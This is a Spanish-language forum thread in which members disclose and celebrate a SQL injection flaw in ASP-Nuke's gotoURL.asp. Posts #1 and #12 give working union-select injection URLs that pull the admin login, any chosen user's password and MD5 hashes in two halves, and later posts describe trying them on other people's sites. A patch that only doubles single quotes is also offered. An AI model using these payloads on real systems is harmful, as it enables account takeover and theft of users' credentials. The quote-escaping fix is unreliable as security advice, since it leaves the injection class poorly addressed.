sql injection en asp-nuke

Estado
Cerrado para nuevas respuestas
C

Cobac

Guest
#1
Bueno hemos descubierto (con alnitak :-*) un fallo en los asp-nuke mediante el cual puedes sacar el password de kien quieras el fallo esta en el archivo addurl-inc.asp que se incluye en el archivo gotourl.asp

y este no revisa las variables que le llegan por lo que puedes hacer una cosa como esta:

Insertar CODE, HTML o PHP:
http://victima.com/gotoURL.asp?url='%20union%20select%20udate,%20ulogin%20FROM%20users%20
esto te dara el nick del admin y lo siguiente su pass:
(te lo da porque ahi he puesto que muestre la primera el password y el login de la primera fecha (udate), y el primero que se crea es el admin )

Insertar CODE, HTML o PHP:
http://victima.com/gotoURL.asp?url='%20union%20select%20udate,%20upassword%20FROM%20users%20
aunque también puedes sacar el password de cualquier usuario haciendo lo siguiente:

Insertar CODE, HTML o PHP:
http://victima.com/gotoURL.asp?url='%20union%20select%20ulogin='nick',%20upassword%20FROM%20users%20
solo tienes que poner el nick de quien quieras sacar el password

Versiones afectadas todas (hasta ahora :))

para solucionar el problema teneis que añadir lo siguiente en el archivo addurl-inc.asp antes de
Insertar CODE, HTML o PHP:
Set oCn = DBConnexion(DB_MAIN)
Insertar CODE, HTML o PHP:
sURL = Trim(sURL)

sURL = Replace(sURL,"'","''")
asi con eso limpias las comillas simples y ya no se puede atacar de esa forma

saludos y a parchear vuestros asp-nuke XDD

P.D.:Tengo que dar las gracias a mek (porque gracias a el y a soportarme se todo lo que se), a alnitak por ayudarme en esto y, especialmente, a jbex por soportarme y dejarme hacer todas estas pruebas :)
 

alnitak

Ex-Admin
Miembro
#2
Jbex, donde estás?

Deja de jalarte los pelos que ya Cobac lo ha parcheado :)D

Yo también le quiero agradecer a jbex la paciencia que me tiene porque hacía tiempo que me andaba por aquí tratando de hackerle la Web y nunca se ha molestado :)D

Pero ahora que he cumplido con lo que te había prometido jbex, ósea que me haría administrador pero por mi mismo, ya prometo no seguir para de dejes de preocuparte tanto :)D.

Felicitaciones Cobac, no se como sabes tanto con la edad que tienes :)DD y ojalá se te ocurra pronto otra idea brillante como esta porque he gozado una bola ayudándote :)D.

Y ahora, hasta nuestra próxima misión, ....hackear el Pentagono.....:)DDDDDDD

:) :) :)
 
C

Cobac

Guest
#3
Jbex, donde estás?

Deja de jalarte los pelos que ya Cobac lo ha parcheado :)D
:)DDDDDDD antes de hacerlo publico ya te lo había parcheado, aunque estaría bien ver la gente que lo intenta XDDD

Felicitaciones Cobac, no se como sabes tanto con la edad que tienes :)DD y ojalá se te ocurra pronto otra idea brillante como esta porque he gozado una bola ayudándote :)D.
yo también me lo he pasado de puta madre, haber cuando volvemos ha hacer algo parecido :)
Y ahora, hasta nuestra próxima misión, ....hackear el Pentagono.....:)DDDDDDD
no sera un asp-nuke? XDDDDD

saludos
 

alnitak

Ex-Admin
Miembro
#4
Vale a ver si lo arregláis, que si no vuelvo al html

Te deseo de corazón, que seas feliz en este 2004 que vamos a empezar y alcances tus deseos. (Menos en el hackeo mi web, claro esta, no? )

Un saludo, jbex
jajajjajaajajajajajajajaa

Deja de preocuparte jbex que Cobac ni loco lo hubiera publicado sin estar seguro que aquí ya está mas que parcheado :)

Y el html no me gusta, quedate quieto que esta web va muy bien como está :)D
 

jbex

El que peca y reza empata
Administrador
#5
Jbex, donde estás?

Deja de jalarte los pelos que ya Cobac lo ha parcheado :)D
Estoy terminando de configurar mi XP, por cierto ni sabia que ya estaba parcheado, este Cobac :D, así da gusto, te busca el agujero y te lo arregla :) :) que le vas a pedir más, no?

Un saludo, jbex.
 
C

Cobac

Guest
#6
Estoy terminando de configurar mi XP, por cierto ni sabia que ya estaba parcheado, este Cobac , así da gusto, te busca el agujero y te lo arregla que le vas a pedir más, no?
jajaja, hombre que menos te puedo hacer que estropearlo y luego arreglaro :)

saludos y sigue con tu Windows XP tranquilo :)

P.D.:Me gusta tu avatar 8)
 

el-siniestrO

Nuevo Miembro
Miembro
#7
antetodo mis felicitaciones a esta New Injection :) lo probare.....

creo que es merito de todo el staff :boca:

el-siniestrO
 
C

Cobac

Guest
#8
yo he avisado al sitio oficial, pero me parece que aun no han echo nada demomento creo que solo nuestro sitio esta parcheado, osea que por sitios vulnerables tendras muchos

saludos

P.D.:No seas malos y no empleeis los conocimientos para hacer mal a los demas, si acaso poner una noticia y avisar al admin diciendole como puede solucionar el problema
 

el-siniestrO

Nuevo Miembro
Miembro
#9
disculpassssss ,entoces no fue mi intencion de hacer y sobrepasar tus animos de crecer y detectar vulnerabilidades y luego parcharlas,no es mi intencion hacer daño, solo es como mi regalo de año nuevo :),gracia tio por regalar algo como eso.......

te prometo no dañar nada un saludo :-X

ya lo probe, rula muy bien tio te mereces un :adora: :adora: :adora: :adora: :adora:

solo si rulaba ,solo eso.........

el-siniestrO
 
A

AtomiK

Guest
#10
Bueno senior cobac ..alnitak os espero xa bucar mas bugs :)DDDDDD imaginaros el team trucoswin :)DDDDDDDDDDDDDDDDDDDDDD pos nu ta mal tampoco....podriamos algún dia ponernos de acuerdo y buscar bugs en no se que....un asp nuke o en phpbb o no se que :)...pero aver si sacamos algo grande como esto....solo felicitaros por su gran gran trabajo y diciros que seguir asi..ke vais bien encaminaos ( no os sorprendais si os mandan pm pidiendo autografos :)D)

Un salu
 
C

Cobac

Guest
#11
gracias ury :-*

pues no estaría mal un team... :)

saludos
 

alnitak

Ex-Admin
Miembro
#12
Existe un pequeño problema para explotar el bug en el caso los passwords estén encriptados, debido a que solo se pueden recuperar 20 caracteres y un hash MD5 tiene 32.

En este caso habrá que recuperar primero los 16 caracteres de la izquierda y después los otros 16:

Insertar CODE, HTML o PHP:
http://www.victima.com/gotoURL.asp?url=';%20union%20select%20ulogin='nick',%20left(upassword,16)%20FROM%20users%20

http://www.victima.com/gotoURL.asp?url=';%20union%20select%20ulogin='nick',%20right(upassword,16)%20FROM%20users%20
Las versiones vulnerables son las 1.2, 1.3, 1.4

No vulnerable la 1.1
 
C

Cobac

Guest
#13
pues menos mal que ya has descubierto como se hace para pasar la cadena de poco en poco, porque lo queria mirar yo (me has ahorrado faena ), porque acabo de venir de fiesta XDD

y otra cosa, seguro que las 1.1 no son vulnerables?

yo he visto una 1.1, y me pasa lo que me pasa con www.aspnuke.it, y son vulnerables, lo que hacen es no mostrar los errores en pantalla (que eso no quiere decir que no sean vulnerables XD)

si señor eres un fiera :), pensaba que eso en sql no se podría hacer y me tendria que rebanar los sesos para hacerlo , menos mal que te tengo ati, sino no haria nada :-*

saludos
 

alnitak

Ex-Admin
Miembro
#14
Pues yo creo que de ASP-NUKE 1.1 ya casi no quedan porque solo he dado con uno y no me devolvía el error.

Tampoco he podido conseguir de donde bajarmelo para estudiarlo y ver si el codigo de addurl-inc.asp y los campos de la tabla user son los mismos, así que no sabría decir.

Si sabes como hacer para que te muestre el error, pues, supongo que podría ser vulnerable, habría que probar, pero tampoco me quita el sueño porque casi todos los ASP-NUKE son v1.2 y v1.3.

Tambien he dado con un ASP-NUKE more v2.0 que no se de donde ha salido y que no es vulnerable, pero es tan feo a verse que no creo nadie lo quiera para su sitio así que tampoco me preocupa :)D.
 
C

Cobac

Guest
#15
Tambien he dado con un ASP-NUKE more v2.0 que no se de donde ha salido y que no es vulnerable, pero es tan feo a verse que no creo nadie lo quiera para su sitio así que tampoco me preocupa :)D.
dame la dirección :)

saludos

P.D.:Habra que investigar si no es vulnerable

P.D.2:Esque si no fuera vulnerable no te devolveria una pagina en blanco (como pasa con la v1.1 que yo me he encontrado), ya que (como me dijo mek), se puede hacer que no devuelva los errores al navegador, así aunque este el bug no lo podemos explotar
 
Estado
Cerrado para nuevas respuestas
Arriba Pie